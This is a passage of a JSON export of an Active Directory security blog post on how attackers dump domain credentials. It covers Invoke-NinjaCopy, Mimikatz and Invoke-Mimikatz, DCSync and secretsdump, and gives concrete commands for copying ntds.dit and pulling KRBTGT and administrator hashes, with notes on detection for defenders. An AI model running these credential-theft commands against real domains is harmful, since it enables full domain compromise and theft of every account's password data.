href=\"http:\/\/blogs.technet.com\/b\/sysinternals\/archive\/2016\/01\/05\/update-sigcheck-v2-4-sysmon-v3-2-process-explorer-v16-1-autoruns-v13-51-accesschk-v6-01.aspx\">Sysmon v3.2 adds logging of raw disk and volume access (Event ID 9, RawAccessRead), which can detect Invoke-NinjaCopy use<\/a>.<\/p>\n<blockquote><p><span class=\"message_body\">Sysmon v3.2 now detects raw data access like Invoke-NinjaCopy<br \/>\n&#8220;This release of Sysmon, a background service that logs security-relevant process and network activity to the Windows event log, 
now has the option of logging raw disk and volume accesses, operations commonly performed by malicious toolkits to read information by bypassing higher-level security features.<\/span><\/p><\/blockquote>\n<p>From the Invoke-NinjaCopy file synopsis:<\/p>\n<blockquote>\n<pre>This script can copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This requires you\r\nare an administrator of the server. This allows you to bypass the following protections:\r\n    1. Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or SYSTEM registry hives\r\n    2. SACL flag set on a file to alert when the file is opened (I'm not using a Win32 API to open the file, so Windows has no clue)\r\n    3. Bypass DACL's, such as a DACL which only allows SYSTEM to open a file\r\n\r\nIf the LocalDestination param is specified, the file will be copied to the file path specified on the local server (the server the script is being run from).\r\nIf the RemoteDestination param is specified, the file will be copied to the file path specified on the remote server.\r\n\r\nThe script works by opening a read handle to the volume (which if logged, may stand out, but I don't think most people log this and other processes do it too).\r\nThe script then uses NTFS parsing code written by cyb70289 and posted to CodePlex to parse the NTFS structures. 
Since the NTFS parsing code is written\r\nin C++, I have compiled the code to a DLL and load it reflective in to PowerShell using the Invoke-ReflectivePEInjection.ps1 script (see below for a link\r\nto the original script).<\/pre>\n<\/blockquote>\n<p>Joe Bialek (<a href=\"https:\/\/twitter.com\/JosephBialek\">@JosephBialek<\/a>) wrote the following on <a href=\"https:\/\/clymb3r.wordpress.com\/2013\/06\/13\/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks\/\">his blog about Invoke-NinjaCopy<\/a>:<\/p>\n<blockquote><p>Currently there are a few ways to dump Active Directory and local password hashes. Until recently, the techniques I had seen used to get the hashes either relied on injecting code in to LSASS or using the Volume Shadow Copy service to obtain copies of the files which contain the hashes. I have created a PowerShell script called Invoke-NinjaCopy that allows any file (including NTDS.dit) to be copied without starting suspicious services, injecting in to processes, or elevating to SYSTEM.<\/p><\/blockquote>\n<p>Command:<br \/>\n<em>Invoke-NinjaCopy -Path &#8220;c:\\windows\\ntds\\ntds.dit&#8221; -ComputerName &#8220;RDLABDC02&#8221; -LocalDestination &#8220;c:\\temp\\ntds.dit&#8221;<\/em><\/p>\n<p>This example executes Invoke-Ninjacopy from code downloaded from the Internet and executed entirely in memory. 
If the attacker compromised a workstation a Domain Admin logged onto, this scenario would work, enabling the attacker to copy the Active Directory database file from a Domain Controller to the workstation and then upload to the Internet.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02.jpg\" rel=\"attachment wp-att-2411\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2411\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02.jpg\" alt=\"InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02\" width=\"736\" height=\"133\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02.jpg 1203w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02-300x54.jpg 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02-768x139.jpg 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeNinjaCopy-RunFromInternet-Computer-RDLABDC02-1024x185.jpg 1024w\" sizes=\"auto, (max-width: 736px) 100vw, 736px\" \/><\/a><\/p>\n<p>Using a <a href=\"https:\/\/github.com\/yosqueoy\/ditsnap\">DIT Snapshot Viewer<\/a>, we can validate that we got the ntds.dit file successfully.<br \/>\nI had to &#8220;take a snapshot&#8221; of the ntds.dit file to correct errors when grabbing the file from a running system.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/DITSnapshotViewer-RDLAB.jpg\" rel=\"attachment wp-att-2410\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2410\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/DITSnapshotViewer-RDLAB.jpg\" alt=\"DITSnapshotViewer-RDLAB\" width=\"805\" height=\"604\" 
srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/DITSnapshotViewer-RDLAB.jpg 805w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/DITSnapshotViewer-RDLAB-300x225.jpg 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/DITSnapshotViewer-RDLAB-768x576.jpg 768w\" sizes=\"auto, (max-width: 805px) 100vw, 805px\" \/><\/a><\/p>\n<p><span style=\"text-decoration: underline;\">Note:<\/span><br \/>\n<em>Joe Bialek (<a href=\"https:\/\/twitter.com\/JosephBialek\">@JosephBialek<\/a>), the author of <a href=\"https:\/\/clymb3r.wordpress.com\/2013\/06\/13\/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks\/\">Invoke-NinjaCopy<\/a>, noted that Invoke-NinjaCopy wasn&#8217;t tested on large ntds.dit files, so on a busy DC the copy of ntds.dit it produces may be corrupt (the file changes underneath the raw read). <a href=\"http:\/\/www.harmj0y.net\/blog\/redteaming\/the-case-of-a-stubborn-ntds-dit\/\">Harmj0y has some insight on getting past NTDS.dit file corruption when attempting to dump AD credentials<\/a>.<br \/>\n<\/em><\/p>\n<p>&nbsp;<a id=\"MimikatzLocal\"><\/a><\/p>\n<h4><strong>Dumping Active Directory credentials locally using <a href=\"https:\/\/adsecurity.org\/?page_id=1821\">Mimikatz<\/a> (on the DC).<\/strong><\/h4>\n<p>Often service accounts are members of Domain Admins (or equivalent), or a Domain Admin was recently logged on to the computer an attacker dumps credentials from. 
Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash, which is used to create Kerberos Golden Tickets.<\/p>\n<p><em>NOTE:<br \/>\nThere are many different tools that can dump AD credentials when run locally on the DC; I tend to focus on Mimikatz since it has extensive credential theft and injection capability (and more) enabling credential dumping from a wide variety of sources and scenarios.<\/em><\/p>\n<p>Command:\u00a0 <em>mimikatz lsadump::lsa \/inject exit<\/em><\/p>\n<p>Dumps credential data in an Active Directory domain when run on a Domain Controller.<br \/>\nRequires local administrator rights with SeDebugPrivilege (privilege::debug) or running as Local SYSTEM.<\/p>\n<p>Note: The account with RID 502 is the KRBTGT account and the account with RID 500 is the built-in domain Administrator.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-LSA.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1823\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-LSA.png\" sizes=\"auto, (max-width: 413px) 100vw, 413px\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-LSA-208x300.png 208w, https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-LSA.png 413w\" alt=\"Mimikatz-LSADump-LSA\" width=\"413\" height=\"595\" \/><\/a><br \/>\n<a id=\"InvokeMimikatzLocal\"><\/a><\/p>\n<h4><strong>Dumping Active Directory credentials locally using Invoke-Mimikatz (on the DC).<\/strong><\/h4>\n<p><a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/Exfiltration\/Invoke-Mimikatz.ps1\">Invoke-Mimikatz<\/a> is a component of <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">PowerSploit<\/a> written by Joe Bialek (<a href=\"https:\/\/twitter.com\/JosephBialek\">@JosephBialek<\/a>) which incorporates all the functionality of Mimikatz in a PowerShell 
function. It \u201cleverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.\u201d Note that the PowerSploit framework is now hosted in the <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">\u201cPowerShellMafia\u201d GitHub repository<\/a>.<\/p>\n<p>What gives Invoke-Mimikatz its \u201cmagic\u201d is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or intranet server), and executed from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system.<\/p>\n<p>Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). 
One can swap out the DLL encoded elements (32-bit &amp; 64-bit versions) with newer ones.<\/p>\n<ul>\n<li>Use mimikatz to dump credentials out of LSASS:\u00a0 <em>Invoke-Mimikatz -DumpCreds<\/em><\/li>\n<li>Use mimikatz to export all private certificates (even if they are marked non-exportable): <em>Invoke-Mimikatz -DumpCerts<\/em><\/li>\n<li>Elevate privilege to have debug rights on a remote computer: <em>Invoke-Mimikatz -Command \u201cprivilege::debug exit\u201d -ComputerName \u201ccomputer1\u201d<\/em><\/li>\n<\/ul>\n<p>The Invoke-Mimikatz \u201cCommand\u201d parameter enables Invoke-Mimikatz to run custom Mimikatz commands.<br \/>\n<strong><em>Defenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz.<\/em><\/strong><\/p>\n<p>Command:<br \/>\n<em>Invoke-Mimikatz -Command &#8216;&#8221;privilege::debug&#8221; &#8220;LSADump::LSA \/inject&#8221; exit&#8217;<\/em><\/p>\n<p>Dumps credential data in an Active Directory domain when run on a Domain Controller.<br \/>\nRequires administrator access with debug or Local SYSTEM rights.<\/p>\n<p>Note: The account with RID 502 is the KRBTGT account and the account with RID 500 is the default administrator for the domain.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local.jpg\" rel=\"attachment wp-att-2415\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2415\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local.jpg\" alt=\"InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local\" width=\"1206\" height=\"1694\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local.jpg 1206w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local-214x300.jpg 214w, 
https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local-768x1079.jpg 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local-729x1024.jpg 729w\" sizes=\"auto, (max-width: 1206px) 100vw, 1206px\" \/><\/a><br \/>\n<a id=\"InvokeMimikatzRemote\"><\/a><\/p>\n<h4><strong>Dumping Active Directory credentials remotely using Invoke-Mimikatz (via PowerShell Remoting).<\/strong><\/h4>\n<p><a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/Exfiltration\/Invoke-Mimikatz.ps1\">Invoke-Mimikatz<\/a> is a component of <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">PowerSploit<\/a> written by Joe Bialek (<a href=\"https:\/\/twitter.com\/JosephBialek\">@JosephBialek<\/a>) which incorporates all the functionality of Mimikatz in a PowerShell function. It \u201cleverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.\u201d Note that the PowerSploit framework is now hosted in the <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">\u201cPowerShellMafia\u201d GitHub repository<\/a>.<\/p>\n<p>Command:<br \/>\n<em>Invoke-Mimikatz -Command &#8216;&#8221;privilege::debug&#8221; &#8220;LSADump::LSA \/inject&#8221;&#8217; -Computer RDLABDC02.rd.adsecurity.org<\/em><\/p>\n<p>This example executes Invoke-Mimikatz from code downloaded from the Internet and executed entirely in memory. 
If the attacker has compromised a workstation that a Domain Admin logged onto, this scenario works, enabling the attacker to grab AD credentials and upload them to the Internet.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02.jpg\" rel=\"attachment wp-att-2413\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2413\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02.jpg\" alt=\"InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02\" width=\"1199\" height=\"1683\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02.jpg 1199w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02-214x300.jpg 214w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02-768x1078.jpg 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02-730x1024.jpg 730w\" sizes=\"auto, (max-width: 1199px) 100vw, 1199px\" \/><\/a><br \/>\n<a id=\"MimikatzDCSync\"><\/a><\/p>\n<h4><strong>Dumping Active Directory credentials remotely using <a href=\"https:\/\/adsecurity.org\/?page_id=1821\">Mimikatz<\/a>&#8216;s DCSync.<\/strong><\/h4>\n<p>A major feature added to <a href=\"https:\/\/adsecurity.org\/?page_id=1821\">Mimikatz<\/a> in August 2015 is \u201cDCSync\u201d, which effectively \u201cimpersonates\u201d a Domain Controller and requests account password data from the targeted Domain Controller. 
DCSync was written by Benjamin Delpy and Vincent Le Toux.<\/p>\n<p>The exploit method prior to DCSync was to run Mimikatz or Invoke-Mimikatz on a Domain Controller to get the KRBTGT password hash to create Golden Tickets. With Mimikatz\u2019s DCSync and the appropriate rights, the attacker can pull the password hash, as well as previous password hashes, from a Domain Controller over the network without requiring interactive logon or copying off the Active Directory database file (ntds.dit).<\/p>\n<p>Special rights are required to run DCSync. Any member of Administrators, Domain Admins, or Enterprise Admins, as well as Domain Controller computer accounts, is able to run DCSync to pull password data. Note that Read-Only Domain Controllers are not allowed to pull password data for users by default.<\/p>\n<p><b>How DCSync works:<\/b><\/p>\n<ol>\n<li>Discovers a Domain Controller in the specified domain.<\/li>\n<li>Requests that the Domain Controller replicate the user credentials via <a href=\"https:\/\/msdn.microsoft.com\/en-us\/library\/dd207691.aspx\">GetNCChanges<\/a> (leveraging the <a href=\"https:\/\/msdn.microsoft.com\/en-us\/library\/cc228086.aspx\">Directory Replication Service (DRS) Remote Protocol<\/a>).<\/li>\n<\/ol>\n<p>I have previously done some packet captures for <a href=\"http:\/\/blogs.metcorpconsulting.com\/tech\/?p=923\">Domain Controller replication<\/a> and identified the intra-DC communication flow regarding how Domain Controllers replicate.<\/p>\n<p>The Samba Wiki describes the <a href=\"https:\/\/wiki.samba.org\/index.php\/DRSUAPI\">DSGetNCChanges function<\/a>:<\/p>\n<p><i>\u201cThe client DC sends a DSGetNCChanges request to the server when the first one wants to get AD objects updates from the second one. The response contains a set of updates that the client has to apply to its NC replica. 
&#8230;<br \/>\nWhen a DC receives a DSReplicaSync Request, then for each DC that it replicates from (stored in RepsFrom data structure) it performs a replication\u00a0cycle where it behaves like a client and makes DSGetNCChanges requests to that DC. So it gets up-to-date AD objects from each of the DC\u2019s which it replicates from.\u201d<\/i><\/p>\n<p><strong><a href=\"https:\/\/adsecurity.org\/?page_id=1821#DCSync\">DCSync Options<\/a>:<\/strong><\/p>\n<ul>\n<li>\/user \u2013 user ID or SID of the user whose password data you want to pull.<\/li>\n<li>\/domain\u00a0(optional) \u2013 FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to connect to. If this parameter is not provided, Mimikatz defaults to the current domain.<\/li>\n<li>\/dc (optional) \u2013 Specify the Domain Controller you want DCSync to connect to and gather data from.<\/li>\n<\/ul>\n<p>There\u2019s also a \/guid parameter.<\/p>\n<p><strong>DCSync Command Examples:<\/strong><\/p>\n<p>Pull password data for the KRBTGT user account in the rd.adsecurity.org domain:<br \/>\n<em>Mimikatz \u201cprivilege::debug\u201d \u201clsadump::dcsync \/domain:rd.adsecurity.org \/user:krbtgt\u201d exit<\/em><\/p>\n<p>Pull password data for the Administrator user account in the rd.adsecurity.org domain:<br \/>\n<em>Mimikatz \u201cprivilege::debug\u201d \u201clsadump::dcsync \/domain:rd.adsecurity.org \/user:Administrator\u201d exit<\/em><\/p>\n<p>Pull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain:<br \/>\n<em>Mimikatz \u201cprivilege::debug\u201d \u201clsadump::dcsync \/domain:lab.adsecurity.org \/user:adsdc03$\u201d exit<\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2100\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-Standard-NoClearTextPassword.jpg\" sizes=\"auto, (max-width: 777px) 100vw, 777px\" 
srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-Standard-NoClearTextPassword-238x300.jpg 238w, https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-Standard-NoClearTextPassword-813x1024.jpg 813w, https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-Standard-NoClearTextPassword.jpg 1180w\" alt=\"FGPP-DCSync-Standard-NoClearTextPassword\" width=\"777\" height=\"978\" \/><\/p>\n<p>If the <a href=\"https:\/\/adsecurity.org\/?p=2053\">account is enabled for &#8220;reversible encryption&#8221;<\/a>, the clear-text password is also shown.<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2103\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-ClearTexPassword-2.jpg\" sizes=\"auto, (max-width: 761px) 100vw, 761px\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-ClearTexPassword-2-732x1024.jpg 732w, https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-ClearTexPassword-2.jpg 1181w\" alt=\"FGPP-DCSync-ClearTexPassword-2\" width=\"761\" height=\"1064\" \/><\/p>\n<h4>Extract Hashes from NTDS.dit<\/h4>\n<p>One method to extract the password hashes from the NTDS.dit file is Impacket&#8217;s secretsdump.py (Kali, etc.).<br \/>\nYou only need the ntds.dit file and the SYSTEM registry hive from the DC (an Install from Media (IFM) set created with ntdsutil contains both).<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/IMPacket-Dump-Credentials-NTDSdit.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2872\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/IMPacket-Dump-Credentials-NTDSdit.png\" alt=\"IMPacket-Dump-Credentials-NTDSdit\" width=\"1011\" height=\"746\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/IMPacket-Dump-Credentials-NTDSdit.png 1011w, 
https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/IMPacket-Dump-Credentials-NTDSdit-300x221.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/IMPacket-Dump-Credentials-NTDSdit-768x567.png 768w\" sizes=\"auto, (max-width: 1011px) 100vw, 1011px\" \/><\/a><\/p>\n<h4><span style=\"text-decoration: underline;\">References:<\/span><\/h4>\n<ul>\n<li><a href=\"https:\/\/adsecurity.org\/?page_id=1352\">Sean Metcalf\u2019s Presentations on Active Directory Security<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=451\">How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2362\">Attack Methods for Gaining Domain Admin Rights in Active Directory<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=1729\">Mimikatz DCSync Usage, Exploitation, and Detection<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2053\">Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?page_id=1821\">Mimikatz Guide and Command Reference<\/a><\/li>\n<li>Matt Graeber presented on leveraging WMI for offensive purposes at Black Hat USA 2015 (<a href=\"https:\/\/www.blackhat.com\/docs\/us-15\/materials\/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf\">paper<\/a>, <a href=\"https:\/\/www.blackhat.com\/docs\/us-15\/materials\/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf\">slides<\/a>, and <a href=\"https:\/\/www.youtube.com\/watch?v=pqth74Uzxy4\">video<\/a>). 
Matt also spoke at DEF CON 23 (<a href=\"https:\/\/www.youtube.com\/watch?v=xBd6p-Lz3kE\">video<\/a>) with colleagues and dove further into offensive WMI capability (and again at DerbyCon &#8211; <a href=\"https:\/\/www.youtube.com\/watch?v=3UZ3Afm5hO4\">video<\/a>).<\/li>\n<li><a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">PowerShellMafia&#8217;s PowerSploit offensive PowerShell tools on GitHub<\/a><\/li>\n<li>Joe Bialek&#8217;s (<a href=\"https:\/\/twitter.com\/JosephBialek\">@JosephBialek<\/a>) <a href=\"https:\/\/clymb3r.wordpress.com\/2013\/06\/13\/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks\/\">blog post about Invoke-NinjaCopy<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/yosqueoy\/ditsnap\">DIT Snapshot Viewer<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>I previously posted some information on dumping AD database credentials before in a couple of posts: &#8220;How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller&#8221; and &#8220;Attack Methods for Gaining Domain Admin Rights in Active Directory&#8220;. 
This post covers many different ways that an attacker can dump credentials from Active Directory, both &hellip; <\/p>\n<p><a class=\"more-link btn\" href=\"https:\/\/adsecurity.org\/?p=2398\">Continue reading<\/a><\/p>\n","protected":false},"author":2,"featured_media":2413,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[565,11,2],"tags":[784,785,777,786,794,795,598,773,796,772,797,771,787,792,336,770,249,394,774,775,207,599,691,793,316,477,232,776,780,779,781,546,778,782,783],"class_list":["post-2398","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-activedirectorysecurity","category-microsoft-security","category-technical-reference","tag-784","tag-785","tag-activedirectorydatabase","tag-administrator","tag-copy-ntds-dit","tag-copyntds-dit","tag-dcsync","tag-ditsnapshotviewer","tag-dumpactivedirectory","tag-dumpadcredentials","tag-dumpadcreds","tag-dumpcredentials","tag-dumpcreds","tag-esentutl","tag-invoke-mimikatz","tag-invoke-ninjacopy","tag-invoke-reflectivepeinjection","tag-krbtgt","tag-lsadumpdcsync","tag-lsadumplsa","tag-mimikatz","tag-mimikatzdcsync","tag-ntds-dit","tag-ntdsutil","tag-passtheticket","tag-powershellremoting","tag-powersploit","tag-sekurlsalogonpasswords","tag-volumeshadowcopy","tag-vss","tag-vssntds-dit","tag-wmi","tag-wmic","tag-wmicpasstheticket","tag-wmiptt","item-wrap"],"_links":{"self":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/2398","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2398"}],"version-history
":[{"count":38,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/2398\/revisions"}],"predecessor-version":[{"id":2874,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/2398\/revisions\/2874"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/media\/2413"}],"wp:attachment":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2398"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}